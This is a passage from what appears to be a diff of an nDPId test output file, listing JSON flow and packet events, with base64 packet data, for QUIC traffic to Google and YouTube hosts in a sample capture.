{"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431431363,"flow_last_seen":1621431431363,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"45.228.175.189","src_port":60896,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431520499,"flow_last_seen":1621431520499,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":49153,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431482942,"flow_last_seen":1621431482942,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"177.86.46.206","src_port":56488,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431465588,"flow_last_seen":1621431465588,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431760040,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60551,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431857841,"flow_last_seen":1621431857841,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431857841,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"213.188.47.247","src_port":63736,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1621431857841,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431857841,"pkt":"AAAAAAAAAAEA00bUCABFAAViuPFAAH4RUFCokEAF1bwv9\/j4AbsFTi6fxv8AAB0I0bxRKTuUwgQAAEU0fyjgv48\/VCRtPz6ASN0OHxQrQLq7h+XvdqYpW0IdDgkyYs+qaZ2IuwKTrk6YqitoieAEJmESJxxd68I9xE+yxkJr90SUnR1M1QTaj6cNmtlgHivCEvYeIZrstWnYNHPWHxnYIDL\/faLN3v2l\/vAW9BxUhwUIIu2faUrN8uHdB\/1Wrbe6vX+0r97gH6rBkczoTPMVg2MQIvACvg7MEMvDmXReZiu8aHhYLNrKXQoHb3wlKFlaWklVhuGIkGp4WLeoDI28YQ3SoqEC3msnpaiKbJSu3i6gx3XYZSTNOZx2wTyUn5kAQEbqb5uoOB1osvVBX+OO4htJiDv1h\/1wp1YCP4Ga4XsP5b3LRFOWiCauo\/HDX\/dO+7Ks21ut5u7nrFp3vsYoOXsfxp3FeIFKCtW5kZD4EnHVyJ9Zv5ZsjCJnr6xOm5z7e1IdJiZc2UH557C9gO4HZL07YwIYBvxA4wecK4fxBR7uVNiQ0wrRJ7w0kX8LOcTGayOjs2lnNAGuPIUjzX6GdQ+Z6ezg2kVKIBy3g6BFqh5fYkn1MSCjFfmNy8pMek9wRbT5tx57QhbVEjzXKpfYCtfwBAPjvmTcyi\/pj1MMF5TdQU6Q9QzzZlwgK7SGoS2km9o4rEOuFsTnF65lollpj4WjyeQhLnNa47OLuo7V6lbQKKTXm54krAZoSaOjejVJLSvx4iwoHF4MJo0t4oNk8LuJjCQWC817H+Z91yZxFTv9SHWBSuEab71KDyg+CD9tUOH2iasAIoErfwlhLdyeLW8yCcg52npVgZ0HFkVfZqdV2LZOvMnR1Lg\/onBxIxjcTUBxhzgd3czjkrC9JJxXxAgQrtSuhn1dUlC22+vGs9MbLXg8o8BLwo7d1x8VTGQdGCnPHJxR6cm1HaHawimYIbxfZ0eKQ6Vt5aV+WhdjRqtUk3j3G5p0NglB1UWHexuNnoOmN+lBZl\/GapDd2m5Yk7FubUhQNbPoy6E8bME5Hyr\/o7sXuXXRcHrH4\/nWsGCvY2cX9njBk7l0Q3Yczt900ouVi1hKp\/UFjI5huUtSUtRnaMFTMB366CW+VDqVruM59b2jx9lTfzd8Z+TvHn6Syvm4tnFxFqmW3I+PMOiWhZlm7TO8sSkYpmYZPGgg63y9rYr6LeryRTudm5RUAR60p430i9LDtZIPD8L\/MTcq9RO1P7jlBqNqxA9zXscaw\/B56sjo6WGP1vLVdb4FB7besaQ5UMN\/nkGoKYOK0deEGrBwjmMxyU6xHUVyr830VfWqI8HAMQd9zqBnczWNEyIFokx9IwZdRoEl1iKfrT8hCud9tIKVpmH0bVMxmQxtxxxT8zSplUV07U4v7xPcnwepR7HmBCZlhrg1BGmEp4se9b9u4xoLK08+r1ejmIpu8VrM\/VOxNFOxYErJFfxlSs9U3X2QWpe9HZGajMBAk0q9\/clUh17xxU\/E6aLjJj3k35K86utGs2O220V0V06R4gxX2gbFkwOMY9INm5D1T523esnitGk9u1AfZJokW7t1XCTb71Id31C6\/p3ioxcXBd5BAbp\/OL9sejWk9TArIOZnUUDZmTsTOfiogn73e7vN5zFf8cIof0JYkZp9otum3UR4BRg87QtqURR6ehFMZE+c0BmbqnHZ89A\/2y4Apn9NnyDFZ0B9ih4m0az7qg2w2IhGEycq5dwSXGZZcya5GcjtVBe7BZ7TXCBQ0AlSjG\/PcOYH6vAazB1DcKOcGryDTW2ld4S\/DeIQ7lnUczZptB1DL94kJw3IET\/eU6zvDBmlBeRN"} -00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431857841,"flow_last_seen":1621431857841,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431857841,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"213.188.47.247","src_port":63736,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r4---sn-vh5ouxa-hjud.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431857841,"flow_last_seen":1621431857841,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431857841,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"213.188.47.247","src_port":63736,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r4---sn-vh5ouxa-hjud.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431858130,"flow_last_seen":1621431858130,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431858130,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"244.214.160.219","src_port":52273,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1621431858130,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431858130,"pkt":"AAAAAAAAAAEA4PSECABFAAViduhAAH4RAluokEAF9Nag28wxAbsFTqBqzv8AAB0IlCvC3zvNTXQAAEU0bBkQLI3bPsbsoEo+cMFgRuBfI0IwALzZrBviHAA+Z1QJp1oftAmcZe0+1BtbG4PtaoRq86omaKbtxZpajLb14FXlpTsMbQWq548iLQ39D2mbEO3zF7ysXTwD\/P9gtJYLXSC0VWqv8z6iYP7A9ndUj4J9CsimScdH7Ab2WJohqMY5cmDhFqDohhOiLpahlc\/4Ug2oP7U6uykk3o\/sBx1t9\/ooiZ2L9IlfdPdzo5JC+fFevV1mvuFRA6qYzmhcKWxznVBjFJHIj1tsalMyiYEP7klZqDWRsUJbEL6smhbtt9aDog+ge1\/kDqXPWI58aqJbP0clqgdwPz9S2Y6WlkC6+L8byOJjqS6tC8RKuT7szyzaD\/QpeLtuTIaugz0rhTbG3tHV2+eAGw0JlKNnYY4d8gLImSL3Z6Vbebp9MOrwwenGSYEjJEdyKLbl91wAN4oX8fjB0uE4+Z1nljjQ7\/Ma\/RgFHOnpp8JptJLgEJQUuj7kca\/3lobKXvXUHslLAXaGHu93+qu4aAMp7dXhfcVd5T0FWmHXp+hPsOVQgNwfcRktO7mmDqTPc4g+iqUrcYsMitif3WlIVEwBPbtDteCVHHkYIPZf0u+syu9A+I7FZ\/5duQI3QVq8hoSrN7bG5w\/zvEqP\/yYI0sjCFuVzyhXgLIEZJ1qJGRZQmSo00VbsElmeDT5TArRJNB7LuwPPihSe5f5Hs5CtfrGYHAZ3s44Ph6a\/IzKJlY9P8nsk1zJw85nZ+gBW1pbpf7Yx\/rmROIiRfURp5w+iM4nAMz0PpDktxSPJLH6r6IEms2fxM+L62MlUVBrYxZJJ4FKD6OSMvWHR+I0vhCE1kpYYhUmcB5sRAbPNVykSrT9KfoViisi1N4w19VqeUgl2Qcs9W6sML2oqVYyVtGBCD9qZnkUGpY2w200a7PtBxVt\/QBEH9v4MPebuiH5rjnSwmFgF\/YosV+2evpl6G8EYlQHIlAthqw3OzMzNUp2uIoUf6nBnYLeE0fFV+obzpD\/u3S83796oUZOibm+TF\/PrubnS+F6u3RS3ljwSqE7VUMHGjfQSaSRBeed0LreweZVA\/\/uCm2qDttjlLYqNjHyrnYThnZom5ECvmIWgSxX9O95W5BQeuuA7HMmr11Xq9vK9dt33jd5FN1yJ5eBzKVde4uSpSNgwENQ0sTbmXF8W0di2iH\/3Y3JARyiVNvb87pbQiF2C3fPJvBbyOmdUzYi4IKODjNa8529r\/2WPUbyL0gcgBBvdC+00m+RoZ8pSEkm873NVfGtcv7ZJNfBbSSmOtEGolsa1rgMIjqSl+gu3HY54LWS5r+MnsCESbFYroCnveYzrsVdGohrb\/zq3EMH7BAbPbeE2Sc7d\/Ko6vjgRH\/9L3cq8ORzLT3GdrtyRveeT83v+9cCjRxC9ljG22JeAq7TqGxX2jJfa25ONu5zfti\/Q\/UCDd+R5D9Q9slQkxPCeDJTSOXa4gnpgy0Q49vnBGzMzMNwOxtJPSIb2QOpg7IidPlZBf2aUO5XpP0KqgFdpm7BG7ULgBjR2GFmXUP1c\/zzdTDDutnR9ALbmfU8Kf5Krd1hNOuhGq5klqMBVXf6hyAA9S4QMp\/it8pHP4\/S66VpOu3bNUTeTIUh888Aqw1WB0NjCw6\/asqZTdZrh8cvMmW+2WW7xmsl6WAqYoU+tialu7WkDUU8OoT42banjTBlSGGvh8863vIZ2StyYDb8zwIU4zuhyMr7FDtlza6jHpIArriq6hYW\/CxoKThchF5eUWwDlQolmqcSSMgBX"} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431858130,"flow_last_seen":1621431858130,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431858130,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"244.214.160.219","src_port":52273,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r3---sn-vh5ouxa-hju6.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431858130,"flow_last_seen":1621431858130,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431858130,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"244.214.160.219","src_port":52273,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r3---sn-vh5ouxa-hju6.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431858501,"flow_last_seen":1621431858501,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431858501,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":49324,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1621431858501,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431858501,"pkt":"AAAAAAAAAAEA737VCABFAAViA9lAAH4RSiuokEAFI8KdL8CsAbsFTiKUxP8AAB0Iuy4iiZ7Rc3cAAEU0Q4F3W2ov\/JA2RQPk1kCE6d2abuA1AzJ9v4cgD5r98N+jLM5q\/vKba7ePXttHZOnfzIXKHdtGp13XXGc0y1g0VbYiejL5PEPTPKK+5FUHxNJc+4iSUfYHJil1jWJsaI14aq8Z9k\/D9Frx2Pd8Ccb5b8I5wMMvAXlFIaThZX3+88jwhgIBY4WhNolXEK3QjVERqqjNlflz0Crvl9eKzWDjAvjmOz12493yS+U4C5g7xeSC6Cv481a1zOEEDBXxUJwyeekPCKvNOVETC0idyTRu4Xx7IK\/97JI5UkTjH1VgYb5EEV1DY00jaUTBEjI+fpvuHX57KvIXmj+n1PLaIlVIJy8AxZjfib+NKJ2DnJlEkZOyKzqiFASH+Rv2xHATwBmim0oQbD6SH+mogD\/Zpo5pMTXstRq0ZunclX1q7Mso4TGqtUbs2zzTYctOAA+ng0TvelIWG4Bu4bkkRiZSqlwJ1jDY17CBHzqEyVQgWgeFozJDhGJh\/dhP8nm+IU5EDOJiIPPx8pW7TyQGz8lnsN6LAsQyJgXVZTCNJPU9t6HmegbS0bQ7Kt1DxeYvK6m+GxUMA1DiRw0yw80Uxxf4xuJnn3EJVi8ekAMdVXpaGI37r+vhgsLGCAZgMrHlnTtfOSbgYZBAPdnhiG4xbmDlbIuvY\/BrdQlshSbHN\/3tWjBfc0Zz0J59ufrjAJoriiVdye+Lc3LAld\/nudhV2vnaxR1ShgYPYZhQbGRWlEkEaL1z4rltv60VXAhCWkeJdSv1\/ACb44aJ8HLAaQ7pBCmit\/NMrMwITKyJcPkFF5GRWhel5oEvZ86mY1\/+WA5KqTi9Xb0N6B9CXR4d22U1O5JA419I\/H5b7Kkx0ByhWkeFRz9cXZPMDmowmLHSflTpfTjRerEoB9b+Rp9ZUpHpgHycHnEiiqsSYZ8fJXaPa5ArE6FfrIB\/5\/ex2ULG10VUM6bdMkBHDYOPYQwR5jQfvBJclQo48pqc+jEulTW4ACP9EukaDaWRXQiI\/ao9oqdHF73hElq8zIR0CIH1bOZkU5WrVTO4kXEcriR07\/4SHXlZ0F+XTEnvRY1owmXDXHgtgn794JMTxP6ovnrC1UqLv9d8SQ3P2kaXpKnETUi1\/jmOit96zvfXkyF+GojweLkNJjL5JM3njEGp7izSmZ\/PvKHWCYsP+157DfpYPmMO9R\/yz3E1zaEv\/1lMgciv1XSwptuzqoQHSbZjgs5nX68VkOSYsQYJ60P94MXKCCvjFqKn+6X2Mcn5Zop+3W0Nj0hveNw19pzYiEtOJJVwof6DyxkFKNuQU3HtgPl+GWUUWRig\/vzAY+l22jeUNKekbZmAn14baa3EO6690bwRTg8ZvdcHFz9TEDMbzR666JgoyJFvKc3UbuWhbUstPfau4V9F9qnYD6cFiMRtdBaOgJniitEFpxszoLhTHZZT9Vh\/mXiomY\/wkAwa56XbyHUeRgPu9zAwN6kJW+N7Ye6rlwVPmyPFgUTGn9xmD2YMEr3PeigCIEsSvM0ujBoTlPiFdY26WdH4Tr\/XKmZTQnQrnQptoJDzmG+XaceU23hwOGeY5C6MIxfdvw7Blgvoz8uvCg\/rl0wKl3ubvkABoQ3NzBDUuTP++2gH8HONwB\/wWFza94nHQdoBnk4+rigd+C1oglD8lXIC31MYbN8b51797Aod+NKPnYy35esPaxwNUQDbAPX6W5J2vPC3vU+GmsC754Qjyng5h09pOy7odu+JINrtufSLUCeH14aG0hXQTPJRTPDp6g0aPtL075ZE"} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431858501,"flow_last_seen":1621431858501,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431858501,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":49324,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431858501,"flow_last_seen":1621431858501,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431858501,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":49324,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00602{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":39,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":39,"packets-processed":38,"total-skipped-flows":0,"total-l4-payload-len":51300,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":27,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":27,"total-idle-flows":23,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":119,"global_ts_msec":1621431907429} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431907429,"flow_last_seen":1621431907429,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431907429,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"136.125.67.96","src_port":62047,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1621431907429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431907429,"pkt":"AAAAAAAAAAEASYHhCABFAAViVjpAAH4R7N2okEAFiH1DYPJfAbsFTr4Zy\/8AAB0I\/FKj4Rr2N+kAAEU0sUI8yYk\/y\/bPar7IxdtLPlBpfIbJVt\/XG3zjjFAN3PLuPY9aF7M0Mm1Pwz+2ym6LReOn1tdk2pHBdYLYtkb1fXiK42fzBzEBqAcpJ3jEWiim3tGYhBW4xkjPcpkR4V9U0CEIA3BhEltloJi32PcQkjdxPGPSXrYJEyPYT2ODSFP5zFDNrUpqMfmpryMeEByqj9aqyy7TtbIyDDLLeql6c5+G+WJfvTxj\/9W8WJJXv5A2+2wt7cmjNXE5vXIKsxD6kuaexZdsNa+Jr4jhQmDPWt56pOF3oSc\/exjC9ZwNL6Byz+cqgo090k1LpSBEAmIO2JahQD43fCbyWV4juaKj0MNO1pbmnz4OwflX262ok\/jM84d9YgjHmPQxVDwGpKB+k7iS9gP0IunBzPqxZuHmkhsXO2zydYFJgSC\/\/zhZjHtGa3A5oLpp5svgFFyHIWHwV1WsgPl5G+m0zjGIw88EoCFcNVrWAkqaltwzoOYaOv8JtFjKTBrTWSS2yCenFPvS4CiVpH0qOzrWck30mR6VKv+x6O39S8f9xZtECQhmG2mYSgzqYSOTLu8TYzFGeM6fkshiZAH4Rcuh\/rlN\/Jsa5H6fbeTi4JAaGZso4qnhApLrXa2o7crXqkvVvH28YWmlFQx+j96UuaBvpXUP+eVJpGTHlKAySs7PdqSueL59G0N7i7L9plI6+dk46FvYeEp+f7wxaDe9ofiPhkKl77nzCoHlpu9QHGjUG1hD3LrTqagn5YxaAe\/vZz+ZR5XDMGkyjvtQ8CzH750O\/y3RIu\/NzoJHfz70Mwhb5mva6OuXGfu3pnDfzyYgmW2f1EdlTYToarOz0VkmFc90sq7r5B7\/PNAKsIbJnOQjS463M2IqteuzLlV\/keR25no9irWXNenFMchSjXATFHJrxa4+tuks0hrAuCQ9P74T8tIg\/9Rn7z3XecTiiaReESIeFX0atEm6CxOi26ozXUDN+aybaCuI9uH4o3kMLh8H9APymvsHTZQpUtqIhC\/oo5G5CBnxU1wWMKhoH5C8zcwERQJ1+G9XqwN3WjaalURD+EDpCo6uvKka1xUNuYrbD3WxT0n1ODENp0Qq8Ouczn6Bc74W3bNVp3L\/70lPtnGF\/vDIQ0AgcqodmWxltWd4x+oE5e9lDvVivstNGUsf3WVMBPLQOTWeJow9hxLTXFulkHKm\/9m8ONJVe8mRVVH3uwATt6K7cW+M5UHJlGbqkrrKvaq6stg6DWgtUtqTZGBCuGviWVywpkMFl8JYsKFOo2C8dYdoed+lyR29yIQyzC+5PshUVMz+15EUTfehVIrQdinMs8GC1ufyZUllTZ3PDmgBejR3TZTfNXPjDfwNc+TazIP8DqvBBPRJBB2kbLub9\/kgyw1MlzRzbAVqKbkfo6Xh7m\/la1ItF1D8yrjJBFh9Tmgu4+xXJRv7DW6+G1WkmPAAG9w\/i5FmPFMvZQ76UHxJWyfTyoxkIVglJSTw2j5Mv6nedASTTIn+oaAKlR0MpsDHaGI6cAT0G5S4F+89LSYi0DoIHcWC2W70SgDJsNbgysQVHdV4uTwXh\/LOoPR1c\/24Ev\/nFE4oTBtSXRHj\/g9aJYtNJ4Bphqchj\/ydCiV1FKZ4F0VFKXdo786gAHfX2mBeOeLn0Lhn3tTg\/G9s+9dQN5nOBgv0p5HQgLKG6NUNXB4bml7Gr4C7jyXtpqMA10w34E9oSHrOYzPVMRKouJzSoQiDSBJKXtDko+KZvedTXBDCzTxXxdQMGdU5EABWjdJgadLe3U6LR1WE"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431907429,"flow_last_seen":1621431907429,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431907429,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"136.125.67.96","src_port":62047,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons4.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 